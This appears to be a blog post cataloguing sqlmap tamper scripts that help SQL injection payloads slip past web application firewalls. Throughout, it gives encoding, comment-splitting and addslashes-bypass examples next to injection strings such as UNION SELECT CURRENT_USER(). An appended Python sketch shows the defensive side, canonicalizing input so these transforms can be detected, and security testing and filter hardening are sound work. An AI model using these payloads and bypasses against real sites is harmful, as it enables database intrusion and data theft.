Sqlmap Tamper Script Collection (3)

2014-08-12 10:44:42 | Category: WAF bypass

Script: sp_password.py
Function: appends sp_password to the end of the payload for automatic obfuscation from DBMS logs
Example:
('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'

Requirement:
* MSSQL

Script: chardoubleencode.py
Function: double URL-encoding (already-encoded characters are not processed)
Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

Script: unionalltounion.py
Function: replaces UNION ALL SELECT with UNION SELECT
Example:
('-1 UNION ALL SELECT')
'-1 UNION SELECT'

Requirement:
all

Script: charencode.py
Function: URL-encoding
Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
  • Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
  • The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS

Script: randomcase.py
Function: random upper/lower case
Example:
* Input: INSERT
* Output: InsERt

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0

Script: unmagicquotes.py
Function: wide-character bypass of GPC addslashes
Example:
* Input: 1' AND 1=1
* Output: 1%bf%27 AND 1=1--%20

Notes:
  • Useful for bypassing magic_quotes/addslashes feature

Script: randomcomments.py
Function: splits SQL keywords with /**/
Example:
INSERT becomes IN/**/S/**/ERT

Script: versionedkeywords.py
Function: Encloses each non-function keyword with versioned MySQL comment
Example:
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
* Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

Requirement:
* MySQL

Script: charunicodeencode.py
Function: unicode-encodes the string
Example:
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045

Requirement:

* ASP
* ASP.NET
Tested against:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
* MySQL 5.1.56
* PostgreSQL 9.0.3
Notes:
  • Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset

Script: securesphere.py
Function: appends a specially crafted string
Example:
('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'"

Tested against:
all

Script: versionedmorekeywords.py
Function: comment-based bypass
Example:
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

Requirement:
* MySQL >= 5.1.13

Script: space2comment.py
Function: Replaces space character ( ) with comments /**/
Example:
* Input: SELECT id FROM users
* Output: SELECT/**/id/**/FROM/**/users

Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
  • Useful to bypass weak and bespoke web application firewalls

Script: halfversionedmorekeywords.py
Function: adds a comment before each keyword
Example:
* Input: value UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND QDWa='QDWa
* Output: value/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND QDWa='QDWa

Requirement:
* MySQL < 5.1
Tested against:
* MySQL 4.0.18, 5.0.22
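
The notes above say the encoding and comment transformations only get past filters that match on the raw request. As an added example (not from the original post and not sqlmap code), this sketch shows the defensive counterpart: canonicalizing a parameter value before any rule is applied, so the outputs listed on this page all reduce to a matchable form. The names canonicalize and looks_like_sqli and the single illustrative rule are assumptions.

```python
import re
from urllib.parse import unquote

# Names and the single rule below are illustrative assumptions, not a ruleset.
_PCT_U = re.compile(r"%u([0-9a-fA-F]{4})")        # %uXXXX escapes (ASP/ASP.NET)
_VERSIONED = re.compile(r"/\*!\d*")               # MySQL /*! and /*!NNNNN openers
_COMMENT = re.compile(r"/\*.*?\*/", re.S)         # plain /* ... */ comments
_RULE = re.compile(r"\bunion\s+(all\s+)?select\b|\band\s+\d+\s*=\s*\d+")


def canonicalize(value: str, comment_as: str = " ", max_rounds: int = 5) -> str:
    """Decode and flatten `value` into the form rules are matched against."""
    for _ in range(max_rounds):                   # repeat: double encoding
        step = _PCT_U.sub(lambda m: chr(int(m.group(1), 16)), value)
        step = unquote(step, errors="replace")
        if step == value:
            break
        value = step
    value = _VERSIONED.sub(" ", value)            # keep the enclosed keyword
    value = _COMMENT.sub(comment_as, value)
    value = value.replace("*/", " ")              # closers of versioned comments
    return re.sub(r"\s+", " ", value).strip().lower()   # also undoes random case


def looks_like_sqli(value: str) -> bool:
    # Two views: comments as whitespace, and comments removed (split keywords).
    views = (canonicalize(value, " "), canonicalize(value, ""))
    return any(_RULE.search(v) for v in views)


if __name__ == "__main__":
    # Inputs are the tamper outputs quoted on this page.
    for sample in ("SELECT/**/id/**/FROM/**/users", "InsERt",
                   "1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/"):
        print(repr(canonicalize(sample)), looks_like_sqli(sample))
```

Matching on both comment views matters because a keyword split by comments only reassembles when the comments are removed rather than replaced by a space.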